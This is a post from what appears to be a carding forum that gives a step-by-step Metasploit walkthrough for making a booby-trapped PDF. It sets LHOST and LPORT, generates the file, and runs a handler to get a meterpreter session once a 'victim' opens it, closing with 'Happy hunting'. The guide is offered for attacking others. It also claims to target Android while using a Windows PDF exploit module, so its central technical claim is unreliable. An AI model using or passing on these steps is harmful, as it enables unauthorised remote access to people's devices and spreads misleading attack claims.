NEW CARDING CHAT IN TELEGRAM

How to hack an Android smartphone via a .PDF file

chushpan

Professional
Messages
333
Reputation
1
Reaction score
323
Points
63
The simplest attack that you can repeat even without a computer.

Hello everyone, dear friends, this article is about hacking an Android smartphone using a PDF file.

To carry out this attack, you can use not only a computer with Linux installed, but also your Android smartphone (you will need to install Termux).

Now we'll tell you everything in more detail...

You will need:​

  1. Termux app (download it from Play Store or F-Droid).
  2. Install Metasploit Framework in Termux.
  3. Termux must be able to use external storage (to do this, enter the command: termux-setup-storage).
  4. (Recommended but not required) Install Hacker'sKeyboard to easily enter commands in Termux.

After everything described above is done, you can start hacking.

Launching the Metasploit console​

  • Open Termux if you are using your smartphone, or Terminal if you are using a Linux computer.
  • Enter the following command to open the Metasploit console
Code:
msfconsole
  • If you see a screen like the one below, then everything is fine:

cea4a01e7ef560d3c298f.png


Create PDF file (Payload)​

  • Enter the command below:
Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Then you have to configure Localhost. For this you will need your IP address, to check its type, enter in a new session window on termux or in another terminal window:
Code:
ifconfig
  • Now go to your metasploit console and enter your IP as follows:
Code:
set LHOST [Your IP]
Replace the IP address specified in the above command with your own IP address.
  • Now it's time to configure the port. To do this, enter the following command:
Code:
set LPORT 4444
You can use any port, such as 4564, 8080, etc.
  • Next we will generate our PDF file using the command below:
Code:
set filename Example.pdf
  • Let's finish the creation process by entering the command:
Code:
exploit
  • Now within a second a message will appear informing you that your PDF file has been created.
  • All that's left is to send this file to your victim. Once they open it, you'll get a metasploit session.

Usage​

  • First, open the metasploit console by typing:
Code:
msfconsole
  • And then enter the commands:
Code:
use exploit/multi/handler/ set LHOST <your_IP> set LPORT 4444 exploit
Make sure you enter the same IP address and port as above in step 2.
  • It will take a little while, after which you will get a meterpreter session.
  • Congratulations! You have gained access to the victim's smartphone and can do whatever you want with it.

That's all for today. Happy hunting!
 
Top